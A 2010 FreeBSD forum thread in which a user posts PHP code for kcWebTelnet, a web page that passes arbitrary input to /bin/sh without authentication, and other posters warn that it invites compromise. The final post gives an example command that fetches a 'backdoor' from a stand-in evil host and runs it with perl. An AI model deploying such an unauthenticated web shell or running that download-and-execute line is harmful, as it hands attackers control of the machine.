# Problem with PHP Script to run FreeBSD shell commands(kcWeb Telnet)



## anti (Apr 22, 2010)

Hi

I am trayin to execute FreeBSD commands using web based page via kcWebTelnet.
I have uploded in my freeBSD machine, and when i tried to execute any command nothing happens.. as in this image:






this is the php code of kcWeb:

start.php

```
<?php
	session_start();
	session_unset();

?>

<html>

<head>

<title>::: kcWebTelnet :::</title>
</head>

<frameset framespacing="1" border="1" frameborder="1" rows="*,25">
  <frame name="kcWebTelnet_Screen" src="screen.php" target="_self">
  <frame name="kcWebTelnet_Command" scrolling="no" noresize marginheight="0" marginwidth="0" src="action.htm">
  <noframes>
  <body>

  <p>This page uses frames, but your browser doesn't support them.</p>

  </body>
  </noframes>
</frameset>

</html>
```

screen.php

```
<?php
function AddToScreen($input, $html=false){
	global $NumberOfLines;
	global $ScreenOutput;
	
	

if($html){$ScreenOutput[$NumberOfLines] = $input;}
	else{$ScreenOutput[$NumberOfLines] = 

str_replace(" ", "&nbsp;", htmlentities($input));}
	
	$NumberOfLines++;
}
	

session_start(); 
	
	// New Session
	if ($NumberOfLines<1){
		$NumberOfLines=0;
		$EnvironmentVariables="";
		$PWD=`pwd`;
		

session_register("ScreenOutput");
		session_register("NumberOfLines");
		session_register

("EnvironmentVariables");
		session_register("PWD");
		
		AddToScreen("kcWebTelnet v0.5");
		AddToScreen("Connecting to 

".`hostname`."...");
		AddToScreen("Connected.");
		AddToScreen(" ");
		

AddToScreen(`/bin/uname -srm`);
		AddToScreen("login: ".`whoami`); 
		AddToScreen("password: ******");		
		AddToScreen(" ");
		AddToScreen(substr(`pwd`, 0, -1)."#");	
	}
	
	
	
	
	if($command){
	
	// Execute Command
	$myID = session_id();
	
	$ScriptName = 

"/tmp/kcWebTelnet_".$myID."_script";
	$EnvName = "/tmp/kcWebTelnet_".$myID."_env";
	

$OutputName = "/tmp/kcWebTelnet_".$myID."_output";
	$PWDName = 

"/tmp/kcWebTelnet_".$myID."_pwd";
	
	
	
	// Display Command
	

$ScreenOutput[$NumberOfLines-1] = $ScreenOutput[$NumberOfLines-1]." <font 

color=yellow><b>".$command."</b></font>";
	
	$Script = "";
	
	//Write 

EnvironmentVariables
	$size= count($EnvironmentVariables);
	for($i=0; $i< $size; $i++){
		

$Script = $Script."export ".$EnvironmentVariables[$i]."\n";	
	}
	
	//Change 

Directory to PWD
	$Script=$Script."cd ".$PWD."\n";
	
	//User Command
	

$Script=$Script."$command > $OutputName 2>&1 \n";
	
	//Storing PWD
	

$Script=$Script."pwd > $PWDName\n";
	
	//Storing EnvrionmentVariable
	

$Script=$Script."pwd > $EnvName\n";
	
	//Generating Script File
	$fp = fopen 

($ScriptName, "w");
	fputs($fp,$Script);
	fclose($fp);
	
	//Executing Script
	exec("/bin/sh 

$ScriptName");
	
	//Reading Output
	$fcontents = file ($OutputName);
	foreach ($fcontents as $line) {
    		AddToScreen($line);
	}

	//Reading EnvironmentVariables
	$EnvironmentVariables= array ();
	$fcontents = 

file ($EnvName);
	foreach ($fcontents as $line) {
    		array_push($EnvironmentVariables,$line);    		
	}
	
	
	//Reading PWD
	$fcontents = file ($PWDName);
	$PWD = substr($fcontents[0], 0, -1);
	
	
	//Remove Files
	unlink 

($ScriptName);
	unlink ($EnvName);
	unlink ($PWDName);
	unlink ($OutputName);
	
	

/*$ScreenOutput[$NumberOfLines-1] = $ScreenOutput[$NumberOfLines-1]." ".$command;
	$out="";
     $NumberOfLines = count($ScreenOutput);
	exec($command, $out);
	for ($i = 0 ; $i < count 

($out) ; $i++) {
		 $ScreenOutput[$NumberOfLines]=$out[$i];
		 $NumberOfLines++;
	}
	*/
	AddToScreen(" ");
	AddToScreen($PWD."#");
	
	}
	
?>

<html>

<head>
<title>::: kcWebTelnet :::</title>
<base target="_self">
<style>
<!--
body        { font-family: Courier New; Tahoma; font-size: 10pt; color: #FFFFFF }
-->
</style>
</head>

<body bgcolor="#000000">
<?php	
	$MAX_LINE = 150;
	$StartLineNumber = $NumberOfLines - $MAX_LINE;
	
	if

($StartLineNumber<0){
		$StartLineNumber=0;
	}
	
	for($i=$StartLineNumber; $i<$NumberOfLines; $i++){
		//echo str_replace(" ", "&nbsp;", htmlentities($ScreenOutput[$i]));
		//echo "
";
		echo $ScreenOutput[$i]."
";
	}
	
?>







&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&n

bsp;&nbsp;&nbsp;

<a name="eof"></a>
<script language="Javascript">

//	self.location.href ="#eof";vfunction myScroll() {
for(i=0; i<100; i++){
    window.scrollBy(0,999)
}

</script>
</body>

</html>
```

I dont know what is the problem? any ideas?

If there are for example other web based php scripts that can i use them as this shell plz tell me about it.


----------



## SirDice (Apr 22, 2010)

Nice way to get pwn3d :e

I hope you're not planning on opening this to the Internet...


----------



## anti (Apr 23, 2010)

SirDice said:
			
		

> Nice way to get pwn3d :e
> 
> I hope you're not planning on opening this to the Internet...



Of course i am not planninng to open it with internet connection. 
I am just planning to design educational :stud web based interface to help for learning FreeBSD commands.Therefore, i want some thing similar to actual shell but as web based (php).
more ideas??


----------



## darkshadow (Apr 23, 2010)

*hi*

I think you should simulate the unix shell , i will help you in doing this .


----------



## anti (Apr 23, 2010)

Thank you guys. I have solved the problem by using phpterm.


----------



## DutchDaemon (Apr 23, 2010)

So, after giving the severely unprivileged user www a login and a shell, I guess it will be added to the wheel group as well? Or password-less sudo perhaps?


----------



## SirDice (Apr 23, 2010)

No need for wheel or sudo, something like this will pw3n the box in no time at all :e

[cmd=]cd /tmp && fetch http://my.evilhost.com/backdoor.txt && perl /tmp/backdoor.txt[/cmd]


----------

